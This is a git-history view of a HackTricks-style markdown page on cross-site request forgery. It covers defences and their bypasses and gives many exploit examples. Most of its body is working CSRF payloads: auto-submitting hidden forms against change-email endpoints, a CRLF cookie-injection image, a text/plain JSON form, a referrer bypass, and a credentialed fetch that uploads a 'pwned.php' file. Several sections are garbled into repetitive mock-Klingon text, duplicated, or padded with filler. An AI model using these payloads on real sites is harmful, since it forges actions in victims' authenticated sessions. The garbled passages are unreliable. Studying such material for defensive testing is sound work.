hacktricks/pentesting-web/csrf-cross-site-request-forgery.md

931 lines
55 KiB
Markdown
Raw Permalink Normal View History

2022-04-28 23:27:22 +00:00
# CSRF (Cross Site Request Forgery)
2022-04-28 16:01:33 +00:00
<details>
2023-12-31 01:25:17 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2023-12-31 01:25:17 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
2022-09-09 11:57:02 +00:00
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2023-12-31 01:25:17 +00:00
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
2024-02-09 07:14:36 +00:00
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2023-12-31 01:25:17 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2023-12-04 15:45:05 +00:00
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-02-27 09:28:45 +00:00
2023-12-04 15:45:05 +00:00
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
2023-02-27 09:28:45 +00:00
2023-12-04 15:45:05 +00:00
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
2023-02-27 09:28:45 +00:00
2023-12-04 15:45:05 +00:00
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
2023-07-14 15:03:41 +00:00
2023-12-04 15:45:05 +00:00
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
2023-07-14 15:03:41 +00:00
2023-12-04 15:45:05 +00:00
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
2022-10-27 23:22:18 +00:00
2024-02-05 20:00:40 +00:00
## Cross-Site Request Forgery (CSRF) Explained
2024-02-05 20:00:40 +00:00
**Cross-Site Request Forgery (CSRF)** is a type of security vulnerability found in web applications. It enables attackers to perform actions on behalf of unsuspecting users by exploiting their authenticated sessions. The attack is executed when a user, who is logged into a victim's platform, visits a malicious site. This site then triggers requests to the victim's account through methods like executing JavaScript, submitting forms, or fetching images.
2024-02-05 20:00:40 +00:00
### Prerequisites for a CSRF Attack
To exploit a CSRF vulnerability, several conditions must be met:
2024-02-05 20:00:40 +00:00
1. **Identify a Valuable Action**: The attacker needs to find an action worth exploiting, such as changing the user's password, email, or elevating privileges.
2. **Session Management**: The user's session should be managed solely through cookies or the HTTP Basic Authentication header, as other headers cannot be manipulated for this purpose.
3. **Absence of Unpredictable Parameters**: The request should not contain unpredictable parameters, as they can prevent the attack.
2024-02-05 20:00:40 +00:00
### Defending Against CSRF
Several countermeasures can be implemented to protect against CSRF attacks:
2024-02-05 20:00:40 +00:00
* [**SameSite cookies**](hacking-with-cookies/#samesite): This attribute prevents the browser from sending cookies along with cross-site requests. [More about SameSite cookies](hacking-with-cookies/#samesite).
* [**Cross-origin resource sharing**](cors-bypass.md): The CORS policy of the victim site can influence the feasibility of the attack, especially if the attack requires reading the response from the victim site. [Learn about CORS bypass](cors-bypass.md).
* **User Verification**: Prompting for the user's password or solving a captcha can confirm the user's intent.
* **Checking Referrer or Origin Headers**: Validating these headers can help ensure requests are coming from trusted sources. However, careful crafting of URLs can bypass poorly implemented checks, such as:
2024-02-10 17:52:19 +00:00
- Using `http://mal.net?orig=http://example.com` (URL ends with the trusted URL)
- Using `http://example.com.mal.net` (URL starts with the trusted URL)
2024-02-05 20:00:40 +00:00
* **Modifying Parameter Names**: Altering the names of parameters in POST or GET requests can help in preventing automated attacks.
* **CSRF Tokens**: Incorporating a unique CSRF token in each session and requiring this token in subsequent requests can significantly mitigate the risk of CSRF. The effectiveness of the token can be enhanced by enforcing CORS.
2024-02-05 20:00:40 +00:00
Understanding and implementing these defenses is crucial for maintaining the security and integrity of web applications.
2022-05-01 13:25:53 +00:00
## Defences Bypass
2022-05-01 13:25:53 +00:00
### From POST to GET
2021-11-30 16:46:07 +00:00
Maybe the form you want to abuse is prepared to send a **POST request with a CSRF token but**, you should **check** if a **GET** is also **valid** and if when you send a GET request the **CSRF token is still being validated**.
2022-05-01 13:25:53 +00:00
### Lack of token
2024-02-05 20:00:40 +00:00
Applications might implement a mechanism to **validate tokens** when they are present. However, a vulnerability arises if the validation is skipped altogether when the token is absent. Attackers can exploit this by **removing the parameter** that carries the token, not just its value. This allows them to circumvent the validation process and conduct a Cross-Site Request Forgery (CSRF) attack effectively.
2022-05-01 13:25:53 +00:00
### CSRF token is not tied to the user session
2024-02-05 20:00:40 +00:00
Applications **not tying CSRF tokens to user sessions** present a significant **security risk**. These systems verify tokens against a **global pool** rather than ensuring each token is bound to the initiating session.
Here's how attackers exploit this:
1. **Authenticate** using their own account.
2. **Obtain a valid CSRF token** from the global pool.
3. **Use this token** in a CSRF attack against a victim.
This vulnerability allows attackers to make unauthorized requests on behalf of the victim, exploiting the application's **inadequate token validation mechanism**.
2022-05-01 13:25:53 +00:00
### Method bypass
2024-02-05 20:00:40 +00:00
If the request is using a "**weird**" **method**, check if the **method** **override functionality** is working.
2021-11-30 16:46:07 +00:00
For example, if it's **using a PUT** method you can try to **use a POST** method and **send**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_
This could also works sending the **\_method parameter inside the a POST request** or using the **headers**:
* _X-HTTP-Method_
* _X-HTTP-Method-Override_
* _X-Method-Override_
2022-05-01 13:25:53 +00:00
### Custom header token bypass
2021-11-30 16:46:07 +00:00
If the request is adding a **custom header** with a **token** to the request as **CSRF protection method**, then:
* Test the request without the **Customized Token and also header.**
* Test the request with exact **same length but different token**.
2022-05-01 13:25:53 +00:00
### CSRF token is verified by a cookie
2024-02-05 20:00:40 +00:00
Applications may implement CSRF protection by duplicating the token in both a cookie and a request parameter or by setting a CSRF cookie and verifying if the token sent in the backend corresponds to the cookie. The application validates requests by checking if the token in the request parameter aligns with the value in the cookie.
2024-02-05 20:00:40 +00:00
However, this method is vulnerable to CSRF attacks if the website has flaws allowing an attacker to set a CSRF cookie in the victim's browser, such as a CRLF vulnerability. The attacker can exploit this by loading a deceptive image that sets the cookie, followed by initiating the CSRF attack.
2024-02-05 20:00:40 +00:00
Below is an example of how an attack could be structured:
2021-11-30 16:46:07 +00:00
```html
<html>
2024-02-10 17:52:19 +00:00
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
</form>
<img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body>
2021-11-30 16:46:07 +00:00
</html>
2024-02-05 20:00:40 +00:00
2021-11-30 16:46:07 +00:00
```
{% hint style="info" %}
2024-02-10 17:52:19 +00:00
ghobe' **csrf token** vItlhutlh cookie vItlhutlh **attack won't work** vaj **victim your session** set vItlhutlh, 'ej vaj vItlhutlh.
2021-11-30 16:46:07 +00:00
{% endhint %}
2022-05-01 13:25:53 +00:00
### Content-Type change
2020-08-10 09:56:57 +00:00
2024-02-10 17:52:19 +00:00
[**'ej**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests) **POST** method **preflight** requests **avoid** **order** **according to** **Content-Type** values allowed **these**:
* **`application/x-www-form-urlencoded`**
* **`multipart/form-data`**
* **`text/plain`**
2024-02-10 17:52:19 +00:00
However, **severs logic may vary** **Content-Type** used **note that** so **values mentioned** **others** **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
2022-04-22 08:32:18 +00:00
2024-02-10 17:52:19 +00:00
Example (from [here](https://brycec.me/posts/corctf\_2021\_challenges)) **JSON data** **sending** **text/plain** **as** vItlhutlh:
2022-04-22 08:32:18 +00:00
```html
<html>
2024-02-10 17:52:19 +00:00
<body>
<form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
</form>
<script>
form.submit();
</script>
</body>
2022-04-22 08:32:18 +00:00
</html>
```
2024-02-05 20:00:40 +00:00
### Bypassing Preflight Requests for JSON Data
2024-02-10 17:52:19 +00:00
**JSON Data**-nISmoHmeH POST request-vam vItlhutlh `Content-Type: application/json`-nISmoHmeH HTML form-vam vItlhutlh. **XMLHttpRequest**-vam vItlhutlh content type-vam vItlhutlh preflight request-vam vItlhutlh. 'ach, **Content-Type**-vam vItlhutlh limitation-vam vItlhutlh bypass-vam vItlhutlh je **server**-vam JSON data-vam process-vam vItlhutlh Content-Type-vam vItlhutlh:
2022-02-21 15:48:28 +00:00
2024-02-10 17:52:19 +00:00
1. **Alternative Content Types**-nISmoHmeH: **Content-Type: text/plain** yIlo' **Content-Type: application/x-www-form-urlencoded**-vam vItlhutlh `enctype="text/plain"` HTML form-vam vItlhutlh. **Backend**-vam Content-Type-vam vItlhutlh data-vam process-vam vItlhutlh.
2024-02-10 17:52:19 +00:00
2. **Content Type vItlhutlh**: Preflight request-vam vItlhutlh, **server**-vam content-vam JSON vItlhutlh, **Content-Type: text/plain; application/json**-vam vItlhutlh data-vam vItlhutlh. Preflight request-vam vItlhutlh, 'ach **server**-vam **application/json** vItlhutlh.
2024-02-10 17:52:19 +00:00
3. **SWF Flash File Utilization**: **SWF flash file**-vam vItlhutlh method-vam vItlhutlh. **Technique**-vam vItlhutlh, **post**-vam [this post](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937)-vam vItlhutlh.
2024-02-10 17:52:19 +00:00
### Referrer / Origin check bypass
2024-02-10 17:52:19 +00:00
**Referrer header**-vam validation-vam vItlhutlh 'Referer' header-vam vItlhutlh. **Browser**-vam header-vam vItlhutlh, HTML meta tag-vam vItlhutlh:
2024-02-05 20:00:40 +00:00
```xml
<meta name="referrer" content="never">
```
2024-02-10 17:52:19 +00:00
**Regexp bypasses**
2024-02-10 17:52:19 +00:00
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}
To set the domain name of the server in the URL that the Referrer is going to send inside the parameters you can do:
**Klingon Translation:**
2024-02-05 20:00:40 +00:00
2022-04-28 23:27:22 +00:00
**Regexp bypasses**
2022-02-13 12:30:13 +00:00
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}
2021-11-30 16:46:07 +00:00
To set the domain name of the server in the URL that the Referrer is going to send inside the parameters you can do:
```html
<html>
2024-02-10 17:52:19 +00:00
<!-- Referrer policy needed to send the qury parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
</form>
<script>
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
</script>
</body>
2021-11-30 16:46:07 +00:00
</html>
```
### **HEAD method bypass**
2023-02-27 09:28:45 +00:00
The first part of [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) is explained that [Oak's source code](https://github.com/oakserver/oak/blob/main/router.ts#L281), a router is set to **handle HEAD requests as GET requests** with no response body - a common workaround that isn't unique to Oak. Instead of a specific handler that deals with HEAD reqs, they're simply **given to the GET handler but the app just removes the response body**.
2023-02-27 09:28:45 +00:00
Therefore, if a GET request is being limited, you could just **send a HEAD request that will be processed as a GET request**.
2022-10-27 23:22:18 +00:00
2022-05-01 13:25:53 +00:00
## **Exploit Examples**
2022-05-01 13:25:53 +00:00
### **Exfiltrating CSRF Token**
If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
2022-05-01 13:25:53 +00:00
### **GET using HTML tags**
2024-02-05 20:00:40 +00:00
```xml
<img src="http://google.es?param=VALUE" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available
```
2024-02-10 17:52:19 +00:00
majDI' HTML5 tags 'ej 'oH 'e' vItlhutlh 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh 'ej 'oH 'e' vIt
2024-02-05 20:00:40 +00:00
```html
<iframe src="..."></iframe>
<script src="..."></script>
<img src="..." alt="">
<embed src="...">
<audio src="...">
<video src="...">
<source src="..." type="...">
<video poster="...">
<link rel="stylesheet" href="...">
<object data="...">
<body background="...">
<div style="background: url('...');"></div>
<style>
2024-02-10 17:52:19 +00:00
body { background: url('...'); }
2024-02-05 20:00:40 +00:00
</style>
<bgsound src="...">
<track src="..." kind="subtitles">
<input type="image" src="..." alt="Submit Button">
```
2022-05-01 13:25:53 +00:00
### Form GET request
2024-02-10 17:52:19 +00:00
#### Description
A Form GET request is a type of HTTP request that is used to retrieve data from a server. It is commonly used when submitting a form on a website, where the form data is appended to the URL as query parameters.
#### Vulnerability
Form GET requests can be vulnerable to Cross-Site Request Forgery (CSRF) attacks. In a CSRF attack, an attacker tricks a victim into unknowingly submitting a malicious request on their behalf. Since the form data is included in the URL, an attacker can construct a URL with the malicious data and trick the victim into visiting it.
#### Exploitation
To exploit a CSRF vulnerability in a Form GET request, an attacker can create a malicious webpage or send a crafted URL to the victim. When the victim visits the webpage or clicks on the URL, the malicious request is automatically sent to the target server, using the victim's session and privileges.
#### Mitigation
To mitigate CSRF attacks in Form GET requests, it is recommended to use the POST method instead. The POST method does not include the form data in the URL, making it more secure against CSRF attacks. Additionally, implementing anti-CSRF tokens can provide an extra layer of protection by validating the origin of the request.
#### Example
Consider the following example of a vulnerable Form GET request:
```html
<form action="https://example.com/profile" method="GET">
<input type="text" name="username" value="admin">
<input type="submit" value="Submit">
</form>
```
In this example, an attacker can construct a malicious URL like `https://example.com/profile?username=attacker`, and trick the victim into visiting it. When the victim submits the form, the request will be sent to the server with the malicious username parameter.
#### References
- [Cross-Site Request Forgery (CSRF)](https://owasp.org/www-community/attacks/csrf)
- [OWASP Testing Guide: Cross-Site Request Forgery (CSRF)](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Testing_for_Cross_Site_Request_Forgery)
2024-02-05 20:00:40 +00:00
```html
<html>
2024-02-10 17:52:19 +00:00
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form method="GET" action="https://victim.net/email/change-email">
<input type="hidden" name="email" value="some@email.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
2022-05-01 13:25:53 +00:00
### Form POST request
2024-02-10 17:52:19 +00:00
#### English
A form POST request is a type of HTTP request that is used to submit data to a server. It is commonly used in web applications to send data from a form to the server for processing. When a user submits a form, the data entered into the form fields is sent to the server in the body of the request.
To make a form POST request, the `POST` method is used in the HTML form element. The form data is then sent to the server as key-value pairs in the body of the request. The server can then process the data and perform the necessary actions based on the submitted form data.
#### Klingon
**Form POST request**
#### English
A form POST request is a type of HTTP request that is used to submit data to a server. It is commonly used in web applications to send data from a form to the server for processing. When a user submits a form, the data entered into the form fields is sent to the server in the body of the request.
To make a form POST request, the `POST` method is used in the HTML form element. The form data is then sent to the server as key-value pairs in the body of the request. The server can then process the data and perform the necessary actions based on the submitted form data.
2024-02-05 20:00:40 +00:00
```html
<html>
2024-02-10 17:52:19 +00:00
<body>
<script>history.pushState('', '', '/')</script>
<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
</form>
<script>
document.forms[0].submit(); //Way 3 to autosubmit
</script>
</body>
</html>
2021-06-04 23:20:57 +00:00
```
2022-05-01 13:25:53 +00:00
### Form POST request through iframe
2021-06-04 23:20:57 +00:00
2024-02-10 17:52:19 +00:00
#### English Translation:
#### Form POST request through iframe
---
#### Klingon Translation:
#### Form POST request through iframe
---
2024-02-05 20:00:40 +00:00
```html
2024-02-10 17:52:19 +00:00
<!--
The request is sent through the iframe withuot reloading the page
2021-06-04 23:20:57 +00:00
-->
<html>
2024-02-10 17:52:19 +00:00
<body>
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
2021-06-04 23:20:57 +00:00
</html>
```
2022-05-01 13:25:53 +00:00
### **Ajax POST request**
2024-02-05 20:00:40 +00:00
```html
<script>
var xh;
if (window.XMLHttpRequest)
2024-02-10 17:52:19 +00:00
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
}
else
2024-02-10 17:52:19 +00:00
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
}
2021-06-05 01:10:15 +00:00
xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
</script>
2021-06-05 01:10:15 +00:00
<script>
//JQuery version
$.ajax({
2024-02-10 17:52:19 +00:00
type: "POST",
url: "https://google.com",
data: "param=value&param2=value2"
2021-06-05 01:10:15 +00:00
})
</script>
```
2022-05-01 13:25:53 +00:00
### multipart/form-data POST request
2024-02-10 17:52:19 +00:00
#### Description
A multipart/form-data POST request is a type of HTTP request that allows you to send binary data, such as files, along with other form data. This type of request is commonly used when uploading files through web forms.
#### Vulnerability
A common vulnerability associated with multipart/form-data POST requests is Cross-Site Request Forgery (CSRF). CSRF occurs when an attacker tricks a victim into performing an unwanted action on a website without their knowledge or consent. In the context of a multipart/form-data POST request, an attacker can craft a malicious request that, when executed by the victim, performs an action on their behalf.
#### Exploitation
To exploit a CSRF vulnerability in a multipart/form-data POST request, an attacker typically needs to trick the victim into visiting a specially crafted webpage or clicking on a malicious link. When the victim performs the action, such as submitting a form, the attacker's request is sent along with the victim's session cookies, allowing the attacker to perform actions on behalf of the victim.
#### Mitigation
To mitigate CSRF vulnerabilities in multipart/form-data POST requests, it is recommended to implement the following measures:
1. Use anti-CSRF tokens: Include a unique token in each form that is submitted via a multipart/form-data POST request. This token should be generated on the server-side and validated upon submission to ensure that the request is legitimate.
2. Implement SameSite cookies: Set the SameSite attribute on session cookies to restrict their usage to same-site requests only. This prevents the browser from sending session cookies along with cross-site requests, effectively mitigating CSRF attacks.
3. Implement strict referer policies: Configure the server to only accept requests that originate from trusted sources. This can be done by checking the Referer header and ensuring that it matches the expected domain.
By implementing these measures, the risk of CSRF attacks in multipart/form-data POST requests can be significantly reduced.
```javascript
myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
2024-02-10 17:52:19 +00:00
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
});
```
2022-05-01 13:25:53 +00:00
### multipart/form-data POST request v2
2024-02-10 17:52:19 +00:00
#### Description
A `multipart/form-data` POST request is a type of HTTP request that allows you to send binary data, such as files, along with other form data. This is commonly used when uploading files through web forms.
#### Vulnerability
A vulnerability can arise when a website does not implement proper Cross-Site Request Forgery (CSRF) protection for `multipart/form-data` POST requests. CSRF occurs when an attacker tricks a victim into performing an unwanted action on a website without their knowledge or consent.
#### Exploitation
To exploit this vulnerability, an attacker can create a malicious website or send a crafted link to the victim. When the victim visits the website or clicks the link, their browser will automatically send a `multipart/form-data` POST request to the target website, performing the unwanted action.
#### Mitigation
To mitigate this vulnerability, it is important to implement proper CSRF protection mechanisms. This can include the use of anti-CSRF tokens, which are unique tokens generated for each user session and included in the `multipart/form-data` POST request. The server can then verify the token to ensure that the request is legitimate.
#### Example
The following example demonstrates a `multipart/form-data` POST request:
```http
POST /upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------1234567890
-----------------------------1234567890
Content-Disposition: form-data; name="file"; filename="example.jpg"
Content-Type: image/jpeg
[Binary data of the file]
-----------------------------1234567890
Content-Disposition: form-data; name="description"
This is an example file
-----------------------------1234567890--
```
In this example, the request includes a file named `example.jpg` and a form field named `description`. The binary data of the file is included in the request body, separated by the specified boundary.
#### References
- [OWASP CSRF Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
```javascript
2024-02-05 20:00:40 +00:00
// https://www.exploit-db.com/exploits/20009
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
2021-06-05 01:10:15 +00:00
xhr.withCredentials = true;
xhr.open("POST", url, true);
// MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";
//xhr.send(body);
xhr.sendAsBinary(body);
```
2022-05-01 13:25:53 +00:00
### Form POST request from within an iframe
2024-02-10 17:52:19 +00:00
#### English
When an HTML form is submitted, the browser sends a POST request to the specified URL. This behavior can be exploited in a Cross-Site Request Forgery (CSRF) attack when the form is submitted from within an iframe.
